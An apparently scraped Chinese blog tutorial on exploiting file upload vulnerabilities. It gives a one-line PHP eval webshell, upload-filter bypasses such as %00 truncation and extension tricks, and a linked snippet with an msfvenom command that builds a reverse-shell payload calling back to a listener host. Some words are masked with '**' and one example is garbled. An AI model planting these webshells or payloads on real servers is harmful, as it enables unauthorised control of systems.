檔案上傳利用

2021-08-04 02:28:23 字數 1403 閱讀 5561

使用工具

一句話**——用於執行webshall程式

中國菜刀——遠端控制

御劍——掃瞄**後台登入頁面

iiswrite——put檔案上傳工具

檔案上傳漏洞是指網路攻擊者上傳了乙個可執行的檔案到伺服器並執行。這裡上傳的檔案可以是木馬,病毒,惡意指令碼或者webshell等。這種攻擊方式是最為直接和有效的,部分檔案上傳漏洞的利用技術門檻非常的低,對於攻擊者來說很容易實施。

檔案上傳漏洞本身就是乙個危害巨大的漏洞,webshell更是將這種漏洞的利用無限擴大。大多數的上傳漏洞被利用後攻擊者都會留下webshell以方便後續進入系統。攻擊者在受影響系統放置或者插入webshell後,可通過該webshell更輕鬆,更隱蔽的在服務中為所欲為。

這裡需要特別說明的是上傳漏洞的利用經常會使用webshell,而webshell的植入遠不止檔案上傳這一種方式。

webshall 是一種以網頁形式存在的命令執行環境,常見的命令有

<?php

eval($_post[a]); ?>

language="php">

eval($_post[a]);

script>

上傳木馬程式

上傳木馬程式通常需要繞過層層過濾,大部分**在**中會存在一定過得檢查機制。需要一定的技巧與漏洞去繞過這些檢查方法

(1)客戶端檢查:攻擊者可以通過nc,fiddler等斷點上傳工具輕鬆繞過客戶端的檢查

(2)伺服器端進行了黑名單檢查:忽略了大小寫,如將.php改為.php即可繞過檢查。

(3)在伺服器端進行了白名單檢查:忽略了%00截斷符,如應用本來只允許上傳jpg,那麼可以構造檔名為***.php%00.jpg,其中%00為十六進製制的0x00字元,.jpg騙過了應用的上傳檔案型別檢測,但對於伺服器來說,因為%00字元截斷的關係,最終上傳的檔案變成了***.php。

(4)檔案上傳後修改檔名時處理不當:攻擊者線上傳允許上傳的檔案,然後通過相應的修改檔案漏洞修改副檔名構造木馬程式。一些應用在伺服器端進行了完整的黑名單和白名單過濾,在修改已上傳檔案檔名時卻百密一疏,允許使用者修改檔案字尾。如應用只能上傳.doc檔案時攻擊者可以先將.php檔案字尾修改為.doc,成功上傳後在修改檔名時將字尾改回.php。

a.通過copy,move命令修改檔案

b.通過**自身漏洞,例如資料庫備份選項

(5)第三方外掛程式時引入,好多應用都引用了帶有檔案上傳功能的第三方外掛程式,這些外掛程式的檔案上傳功能實現上可能有漏洞,攻擊者可通過這些漏洞進行檔案上傳攻擊。

中國小刀獲取webshall許可權

優質文章

科普文之iis寫許可權漏洞

攻防:檔案上傳漏洞的攻擊與防禦

閒話檔案上傳漏洞

檔案上傳漏洞:突破js驗證詳解、

php任意檔案上傳漏洞(cve-2015-2348)

利用flash PHP上傳檔案

廢話少說,先看flash 在flash中新建乙個文件,放上兩個button,乙個progressbar元件 import flash.net.filereference import mx.controls.alert var my pb mx.controls.progressbar var ma...

利用fileReader上傳檔案

上傳檔案 list.resource change changeresfile el radio el radio el radio group fileitem style margin left 25px 本地上傳 type file id fileid ref fileid title cha...

檔案上傳漏洞利用

找到一處上傳點,上傳shell,利用msfvenom生成。msfvenom p php meterpreter revese tcp lhost 192.168.3.171 lport 4444 f raw shell.php本來上傳後,利用msfconle監聽的,但是沒有成功。所以up用了kali...